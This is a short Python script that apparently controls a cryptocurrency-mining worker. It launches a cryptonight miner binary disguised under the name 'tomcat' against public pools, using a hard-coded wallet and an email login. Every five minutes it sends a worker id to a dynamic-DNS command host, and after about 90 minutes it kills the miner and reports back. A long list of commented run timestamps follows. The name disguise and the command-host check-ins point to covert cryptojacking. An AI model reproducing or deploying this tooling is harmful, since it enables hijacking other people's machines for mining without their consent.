import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:47:04.285072
#2018-02-17 17:34:06.681773
#2018-02-17 19:22:08.395090
#2018-02-17 21:12:04.175775
#2018-02-17 22:55:07.797177
#2018-02-18 00:39:06.599588
#2018-02-18 02:29:06.894161
#2018-02-18 04:15:09.388193
#2018-02-18 06:06:05.344303
#2018-02-18 07:57:07.845097
#2018-02-18 09:45:03.234083
#2018-02-18 11:33:04.362842
#2018-02-18 13:18:02.040379
#2018-02-18 15:08:04.700296
#2018-02-18 16:56:01.820932
#2018-02-18 18:43:07.364917
#2018-02-18 20:30:08.104023
#2018-02-18 22:16:06.972552
#2018-02-19 00:05:05.807372
#2018-02-19 01:52:01.980553
#2018-02-19 03:39:05.271290
#2018-02-19 05:23:05.850930
#2018-02-19 07:12:01.611005
#2018-02-19 09:01:04.609350
#2018-02-19 10:49:03.653825
#2018-02-19 12:38:08.154475
#2018-02-19 14:26:08.502885
#2018-02-19 16:15:01.396680
#2018-02-19 18:01:01.283987
#2018-02-19 19:47:06.639172
#2018-02-19 22:29:04.359927
#2018-02-20 00:15:08.626287
#2018-02-20 02:04:04.152323
#2018-02-20 03:54:08.255736
#2018-02-20 05:38:05.618127
#2018-02-20 07:23:06.011038
#2018-02-20 09:08:06.541671
#2018-02-20 10:51:01.328607
#2018-02-20 12:38:07.746798
#2018-02-20 14:24:05.386815
#2018-02-20 16:08:01.421546
#2018-02-20 17:53:01.874716
#2018-02-20 19:43:04.523886
#2018-02-20 21:31:05.921687
#2018-02-20 23:15:07.411158
#2018-02-21 01:00:10.261142
#2018-02-21 02:48:05.731825
#2018-02-21 04:32:05.388836
#2018-02-21 06:19:07.142383
#2018-02-21 08:05:07.394792
#2018-02-21 09:51:03.753816
#2018-02-21 11:39:07.222001
#2018-02-21 13:28:04.098604
#2018-02-21 15:13:09.142951
#2018-02-21 17:03:14.147567
#2018-02-21 18:50:07.741493
#2018-02-21 20:37:06.236147
#2018-02-21 22:23:04.693511
#2018-02-22 00:13:01.748743
#2018-02-22 01:59:06.332040
#2018-02-22 03:46:02.136769
#2018-02-22 05:33:06.686008
#2018-02-22 07:18:07.907086
#2018-02-22 09:07:06.181606
#2018-02-22 10:55:09.169048
#2018-02-22 12:42:06.431771
#2018-02-22 14:28:05.646670
#2018-02-22 16:14:09.135444
#2018-02-22 18:02:10.661376
#2018-02-22 19:51:04.515187
#2018-02-22 21:40:07.621942
#2018-02-22 23:27:04.497835
#2018-02-23 01:14:01.543303
#2018-02-23 03:01:05.177998
#2018-02-23 04:47:07.171825
#2018-02-23 06:33:01.496426
#2018-02-23 08:19:05.227673
#2018-02-23 10:35:08.146528
#2018-02-23 12:28:04.090458
#2018-02-23 14:16:01.639599
#2018-02-23 16:05:10.367024
#2018-02-23 17:51:01.402302
#2018-02-23 19:37:05.571322
#2018-02-23 21:19:05.471448
#2018-02-23 23:07:01.447158
#2018-02-24 00:56:08.564073
#2018-02-24 02:51:05.588372
#2018-02-24 04:41:04.484237
#2018-02-24 06:25:06.010977
#2018-02-24 08:13:06.342710
#2018-02-24 09:57:05.809722
#2018-02-24 11:53:06.258308
#2018-02-24 13:43:06.562781
#2018-02-24 15:33:05.001678
#2018-02-24 17:27:04.604373
#2018-02-24 19:14:05.835637
#2018-02-24 21:01:04.009679
#2018-02-24 23:32:06.940326
#2018-02-25 03:46:05.505516
#2018-02-25 07:31:03.434005